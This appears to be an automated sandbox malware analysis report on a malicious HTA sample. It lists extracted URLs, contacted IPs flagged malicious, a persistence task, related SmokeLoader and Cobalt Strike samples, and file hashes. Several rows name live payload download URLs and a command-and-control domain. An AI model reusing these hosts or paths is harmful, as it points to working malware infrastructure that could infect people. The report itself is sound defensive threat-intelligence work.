https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/koswald/VBScript/blob/master/SetupPerUser.md	wscript.exe, 00000007.00000003.1727917587.0000000005461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731232667.0000000003020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1734359512.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731003803.000000000592F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731407928.0000000005561000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood[1].tiff.4.dr, sweetnessgoodforgreatnessthingswith.vbS.4.dr	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.1762483774.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.00000000047C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1764099136.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 0000000E.00000000.2004435868.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2909647286.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.1762483774.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.00000000047C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/L	explorer.exe, 0000000E.00000000.2004435868.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2909647286.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgt	powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	false		high
https://word.office.com	explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	false		high
http://prolinice.ga/	explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000004.00000002.1762483774.00000000051B9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dnkr4s5yg/image/upload/v173542088	powershell.exe, 00000008.00000002.1939177634.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFI	powershell.exe, 00000004.00000002.1766198522.00000000072DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	false		high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://res.cloudinary.com	powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs	wscript.exe, 00000007.00000003.1731003803.000000000592F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731407928.0000000005561000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood[1].tiff.4.dr, sweetnessgoodforgreatnessthingswith.vbS.4.dr	false		high
https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg	powershell.exe, 00000008.00000002.1939934208.0000000004290000.00000004.00000020.00020000.00000000.sdmp	false		high
https://android.notify.windows.com/iOS	explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://prolinice.ga/index.phpMozilla/5.0	explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2220685342.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2230962875.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2893723974.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2428964622.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2894572076.0000000002D07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2893893666.00000000008C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2894417010.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2894362131.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/dahall/taskscheduler	powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://prolinice.ga:80/index.phposoft	explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://prolinice.ga/2:i	explorer.exe, 00000011.00000002.2249471749.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.comcember	explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	false		high
http://schemas.micro	explorer.exe, 0000000E.00000002.2903801891.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2903005039.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2000821408.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000004.00000002.1762483774.00000000051B9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs0	wscript.exe, 00000007.00000003.1728279245.0000000003597000.00000004.00000020.00020000.00000000.sdmp	false		high
http://prolinice.ga/j	explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://prolinice.ga/ll	explorer.exe, 00000011.00000002.2249471749.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://prolinice.ga/index.phpH	explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	false		high
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/q	explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/koswald/VBScript	sweetnessgoodforgreatnessthingswith.vbS.4.dr	false		high
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882W	powershell.exe, 00000008.00000002.1971873914.0000000006E09000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.1764099136.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	false		high
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFLMEM	powershell.exe, 00000004.00000002.1761871752.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/Vh5j3k	explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	false		high
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 0000000E.00000000.1999335079.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crl.m	powershell.exe, 00000004.00000002.1767676409.0000000008171000.00000004.00000020.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFuuC:	powershell.exe, 00000004.00000002.1767676409.00000000081EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com:443/en-us/feed	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
46.173.214.14	prolinice.ga	Russian Federation		47196	GARANT-PARK-INTERNETRU	true
192.3.27.144	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585851
Start date and time:	2025-01-08 11:08:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	begoodforeverythinggreatthingsformebetterforgood.hta
Detection:	MAL
Classification:	mal100.phis.bank.troj.spyw.expl.evad.winHTA@41/33@2/2
EGA Information:	Successful, ratio: 81.2%
HCA Information:	Successful, ratio: 97% Number of executed functions: 179 Number of non-executed functions: 87
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.17.202.1, 104.17.201.1, 20.42.73.29, 184.28.90.27, 20.109.210.53, 13.107.246.45, 40.126.31.67
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, resc.cloudinary.com.cdn.cloudflare.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target icgfugf, PID 5844 because it is empty
Execution Graph export aborted for target icgfugf, PID 7700 because it is empty
Execution Graph export aborted for target mshta.exe, PID 7452 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:08:55	API Interceptor	95x Sleep call for process: powershell.exe modified
05:09:36	API Interceptor	70926x Sleep call for process: explorer.exe modified
05:10:12	API Interceptor	1x Sleep call for process: WerFault.exe modified
10:09:47	Task Scheduler	Run new task: Firefox Default Browser Agent 186FB1D0F1C89852 path: C:\Users\user\AppData\Roaming\icgfugf

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.3.27.144	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
prolinice.ga	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse	46.173.214.24
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	46.173.214.24
	veryeasythingsevermadeforcreatenewthignsbetterthigns.hta	Get hash	malicious	Cobalt Strike, SmokeLoader	Browse	45.91.8.152
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf	Get hash	malicious	SmokeLoader	Browse	185.251.91.119
	40830001.xls	Get hash	malicious	SmokeLoader	Browse	185.251.91.119
	#20240627_Edlen_B.xls	Get hash	malicious	SmokeLoader	Browse	77.232.129.190
	171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe	Get hash	malicious	SmokeLoader	Browse	77.232.129.190
	#20240627_Edlen_A.xls	Get hash	malicious	SmokeLoader	Browse	77.232.129.190

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GARANT-PARK-INTERNETRU	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	46.173.214.195
	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse	46.173.214.24
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	46.173.214.24
	0HUxKfIvSV.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	0HUxKfIvSV.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	9xNI7vE1XO.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	9xNI7vE1XO.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	bacon.exe	Get hash	malicious	CobaltStrike	Browse	46.173.214.102
	UfRKIdsNvD.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar	Browse	46.173.214.86
AS-COLOCROSSINGUS	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.3.27.144
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.3.27.144
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.3.27.144
	miori.ppc.elf	Get hash	malicious	Unknown	Browse	192.210.142.114
	9876567899.bat.exe	Get hash	malicious	Lokibot	Browse	172.245.123.11
	arm5.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	mips.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	mpsl.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	sh4.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	x86_64.elf	Get hash	malicious	Unknown	Browse	104.168.33.8

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\icgfugf	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse
	invoice727282_PDF..exe	Get hash	malicious	AgentTesla	Browse
	#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse
	6038732).vbs	Get hash	malicious	Lokibot	Browse
	cirby0J3LP.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm, zgRAT	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	3vj5tYFb6a.exe	Get hash	malicious	Snake Keylogger, zgRAT	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_f0a768defacff880d8626d1749fd6d847b83e1c3_07ad8ade_de04faf2-2b87-46aa-965d-40ddd7d19ffd\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.943132230425992
Encrypted:	false
SSDEEP:	192:Rmsc5eCfQ0LZTkrjyaVwzuiFcFZ24lO8k:9cQCfrLZTWjKzuiFcFY4lO8k
MD5:	F4DAB18560E24058B91495A19E634BED
SHA1:	49E002117C96ADD48A36433BA2A13C9E00E18542
SHA-256:	DAEEAAD971B0A1F6DBA1F0BEA504AC53D62896604EC1C3594F089D0896EC00B7
